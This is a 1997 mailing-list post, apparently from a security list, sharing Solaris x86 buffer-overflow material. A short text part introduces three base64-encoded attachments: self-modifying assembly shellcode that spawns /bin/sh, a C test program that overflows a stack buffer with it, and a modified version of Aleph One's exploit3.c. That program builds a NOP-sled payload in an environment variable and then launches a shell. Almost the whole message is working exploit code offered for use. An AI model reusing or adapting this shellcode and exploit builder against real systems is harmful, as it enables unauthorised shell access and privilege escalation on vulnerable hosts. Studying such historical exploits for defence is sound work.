Solaris x86 buffer overflows

jim bresler (jfb11@MICRO-NET.COM)
Thu, 12 Jun 1997 08:49:26 -0400

This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.

--Boundary_(ID_HO+kVQyWQZemnVKJQWJoZQ)
Content-type: TEXT/PLAIN; charset=US-ASCII

Hi, attached is the "shellcode" for Solaris x86 I wrote yesterday.
This includes the code I assembled(it will core dump when ran diretly,
because it is self-modifying), a test program that should spawn a shell,
and a modified version of Aleph One's exploit3.c

Note that most buffer overflows are self-modifying in one part,
this changes itself in two parts. Because a long call is used and
registers cannot be used as arguments, the arguments to the lcall should
be ignored. To avoid the need to leave a null charector in at run time,
the arguments are changed at run-time.

Jim <jfb11@micro-net.com>

--Boundary_(ID_HO+kVQyWQZemnVKJQWJoZQ)
Content-id: <Pine.GSO.3.95.970612084926.15567B@candy.micro-net.com>
Content-type: TEXT/PLAIN; name=solarisx86_shellcode.s; charset=US-ASCII
Content-description:
Content-disposition: ATTACHMENT; FILENAME=solarisx86_shellcode.s
Content-transfer-encoding: BASE64

LmZpbGUJInNvbGFyaXN4ODZfc2hlbGxjb2RlLnMiDQoudmVyc2lvbgkiMDEu
MDEiDQouZ2xvYmwgbWFpbg0KCS50eXBlCSBtYWluLEBmdW5jdGlvbg0KbWFp
bjoNCglwdXNobCAlZWJwDQoJbW92bCAlZXNwLCVlYnANCglzdWJsICQ4LCVl
c3ANCglqbXAgLm9mZnNldDINCi5leGVjdmU6DQoJeG9ybCAlZWF4LCVlYXgN
Cgltb3ZiICQweDNiLCVhbA0KCWptcCAuZG9fbGNhbGwNCglyZXQNCi5leGl0
Og0KCXhvcmwgJWVheCwlZWF4DQoJaW5jICVlYXgNCglqbXAgLmRvX2xjYWxs
DQoJcmV0DQoNCi5sY2FsbF9vZmYxOg0KCXBvcGwgJWVzaQ0KCXhvcmwgJWVi
eCwlZWJ4DQoJbW92bCAlZWJ4LDEoJWVzaSkgDQoJbW92YiAkMHgwNyw1KCVl
c2kpDQoJbW92YiAlYmgsNiglZXNpKQ0KCWptcCAubGNhbGxfaW5zDQouZG9f
bGNhbGw6DQoJY2FsbCAubGNhbGxfb2ZmMQ0KLmxjYWxsX2luczoNCglsY2Fs
bCAkMHgwZjBmLCQweGZmZmZmZmZmDQoJcmV0DQoNCi5vZmZzZXQxOg0KCXBv
cGwgJWVzaQ0KCXhvcmwgJWVheCwlZWF4CQ0KCW1vdmwgJWVzaSwweDgoJWVz
aSkNCgltb3ZiICVhbCwweDcoJWVzaSkNCgltb3ZsICVlYXgsMHhjKCVlc2kp
DQoJcHVzaGwgJWVheA0KCWxlYWwgMHg4KCVlc2kpLCVlYXgNCglwdXNobCAl
ZWF4DQoJbW92bCAweDgoJWVzaSksJWVheA0KCXB1c2hsICVlYXgNCgljYWxs
IC5leGVjdmUNCglhZGRsICQxMiwlZXNwDQoJcHVzaGwgJDB4MQ0KCWNhbGwg
LmV4aXQNCglhZGRsICQ0LCVlc3ANCg0KLm9mZnNldDI6DQoJY2FsbCAub2Zm
c2V0MQ0KCS5zdHJpbmcJIi9iaW4vc2giDQo=

--Boundary_(ID_HO+kVQyWQZemnVKJQWJoZQ)
Content-id: <Pine.GSO.3.95.970612084926.15567C@candy.micro-net.com>
Content-type: TEXT/PLAIN; name=test_sc.c; charset=US-ASCII
Content-description:
Content-disposition: ATTACHMENT; FILENAME=test_sc.c
Content-transfer-encoding: BASE64

Y2hhciBzaGVsbGNvZGVbXSA9IA0KCSJceDU1XHg4Ylx4ZWNceDgzXHhlY1x4
MDhceGViXHg1MFx4MzNceGMwXHhiMFx4M2JceGViXHgxNlx4YzMiDQoJIlx4
MzNceGMwXHg0MFx4ZWJceDEwXHhjM1x4NWVceDMzXHhkYlx4ODlceDVlXHgw
MVx4YzZceDQ2XHgwNSINCgkiXHgwN1x4ODhceDdlXHgwNlx4ZWJceDA1XHhl
OFx4ZWNceGZmXHhmZlx4ZmZceDlhXHhmZlx4ZmZceGZmIg0KCSJceGZmXHgw
Zlx4MGZceGMzXHg1ZVx4MzNceGMwXHg4OVx4NzZceDA4XHg4OFx4NDZceDA3
XHg4OVx4NDYiDQoJIlx4MGNceDUwXHg4ZFx4NDZceDA4XHg1MFx4OGJceDQ2
XHgwOFx4NTBceGU4XHhiZFx4ZmZceGZmXHhmZiINCgkiXHg4M1x4YzRceDBj
XHg2YVx4MDFceGU4XHhiYVx4ZmZceGZmXHhmZlx4ODNceGM0XHgwNFx4ZThc
eGQ0Ig0KCSJceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KY2hhciBsYXJnZV9z
dHJpbmdbMjU2XTsNCg0Kdm9pZCBtYWluKHZvaWQpDQp7DQogY2hhciBidWZm
ZXJbMTkyXTsNCiBpbnQgaTsNCiBsb25nICpsb25nX3B0ciA9IChsb25nICop
IGxhcmdlX3N0cmluZzsNCg0KIGZvciAoaSA9IDA7IGkgPCA2NDsgaSsrKQ0K
ICAgKihsb25nX3B0ciArIGkpID0gKGludCkgYnVmZmVyOw0KDQogZm9yIChp
ID0gMDsgaSA8IHN0cmxlbihzaGVsbGNvZGUpOyBpKyspDQogICBsYXJnZV9z
dHJpbmdbaV0gPSBzaGVsbGNvZGVbaV07DQoNCiBzdHJjcHkoYnVmZmVyLCBs
YXJnZV9zdHJpbmcpOyANCn0NCg==

--Boundary_(ID_HO+kVQyWQZemnVKJQWJoZQ)
Content-id: <Pine.GSO.3.95.970612084926.15567D@candy.micro-net.com>
Content-type: TEXT/PLAIN; name=exploit3.c; charset=US-ASCII
Content-description:
Content-disposition: ATTACHMENT; FILENAME=exploit3.c
Content-transfer-encoding: BASE64

I2luY2x1ZGUgPHN0ZGxpYi5oPg0KDQojZGVmaW5lIERFRkFVTFRfT0ZGU0VU
ICAgICAgICAgICAgICAgICAgICAgMA0KI2RlZmluZSBERUZBVUxUX0JVRkZF
Ul9TSVpFICAgICAgICAgICAgICA1MTINCiNkZWZpbmUgTk9QCQkJCTB4OTAN
Cg0KY2hhciBzaGVsbGNvZGVbXSA9IA0KCSJceDU1XHg4Ylx4ZWNceDgzXHhl
Y1x4MDhceGViXHg1MFx4MzNceGMwXHhiMFx4M2JceGViXHgxNlx4YzMiDQoJ
Ilx4MzNceGMwXHg0MFx4ZWJceDEwXHhjM1x4NWVceDMzXHhkYlx4ODlceDVl
XHgwMVx4YzZceDQ2XHgwNSINCgkiXHgwN1x4ODhceDdlXHgwNlx4ZWJceDA1
XHhlOFx4ZWNceGZmXHhmZlx4ZmZceDlhXHhmZlx4ZmZceGZmIg0KCSJceGZm
XHgwZlx4MGZceGMzXHg1ZVx4MzNceGMwXHg4OVx4NzZceDA4XHg4OFx4NDZc
eDA3XHg4OVx4NDYiDQoJIlx4MGNceDUwXHg4ZFx4NDZceDA4XHg1MFx4OGJc
eDQ2XHgwOFx4NTBceGU4XHhiZFx4ZmZceGZmXHhmZiINCgkiXHg4M1x4YzRc
eDBjXHg2YVx4MDFceGU4XHhiYVx4ZmZceGZmXHhmZlx4ODNceGM0XHgwNFx4
ZThceGQ0Ig0KCSJceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KdW5zaWduZWQg
bG9uZyBnZXRfc3Aodm9pZCkgew0KICAgX19hc21fXygibW92bCAlZXNwLCVl
YXgiKTsNCn0NCg0Kdm9pZCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10p
IHsNCiAgY2hhciAqYnVmZiwgKnB0cjsNCiAgbG9uZyAqYWRkcl9wdHIsIGFk
ZHI7DQogIGludCBvZmZzZXQ9REVGQVVMVF9PRkZTRVQsIGJzaXplPURFRkFV
TFRfQlVGRkVSX1NJWkU7DQogIGludCBpOw0KDQogIGlmIChhcmdjID4gMSkg
YnNpemUgID0gYXRvaShhcmd2WzFdKTsNCiAgaWYgKGFyZ2MgPiAyKSBvZmZz
ZXQgPSBhdG9pKGFyZ3ZbMl0pOw0KDQogIGlmICghKGJ1ZmYgPSBtYWxsb2Mo
YnNpemUpKSkgew0KICAgIHByaW50ZigiQ2FuJ3QgYWxsb2NhdGUgbWVtb3J5
LlxuIik7DQogICAgZXhpdCgwKTsNCiAgfQ0KDQogIGFkZHIgPSBnZXRfc3Ao
KSAtIG9mZnNldDsNCiAgcHJpbnRmKCJVc2luZyBhZGRyZXNzOiAweCV4XG4i
LCBhZGRyKTsNCg0KICBwdHIgPSBidWZmOw0KICBhZGRyX3B0ciA9IChsb25n
ICopIHB0cjsNCiAgZm9yIChpID0gMDsgaSA8IGJzaXplOyBpKz00KQ0KICAg
ICooYWRkcl9wdHIrKykgPSBhZGRyOw0KDQogIGZvciAoaSA9IDA7IGkgPCBi
c2l6ZS8yOyBpKyspDQogICAgYnVmZltpXSA9IE5PUDsNCg0KICBwdHIgPSBi
dWZmICsgKChic2l6ZS8yKSAtIChzdHJsZW4oc2hlbGxjb2RlKS8yKSk7DQog
IGZvciAoaSA9IDA7IGkgPCBzdHJsZW4oc2hlbGxjb2RlKTsgaSsrKQ0KICAg
ICoocHRyKyspID0gc2hlbGxjb2RlW2ldOw0KDQogIGJ1ZmZbYnNpemUgLSAx
XSA9ICdcMCc7DQoNCiAgbWVtY3B5KGJ1ZmYsIkVHRz0iLDQpOw0KICBwdXRl
bnYoYnVmZik7DQogIHN5c3RlbSgiL3Vzci9sb2NhbC9iaW4vYmFzaCIpOw0K
fQ0K

--Boundary_(ID_HO+kVQyWQZemnVKJQWJoZQ)--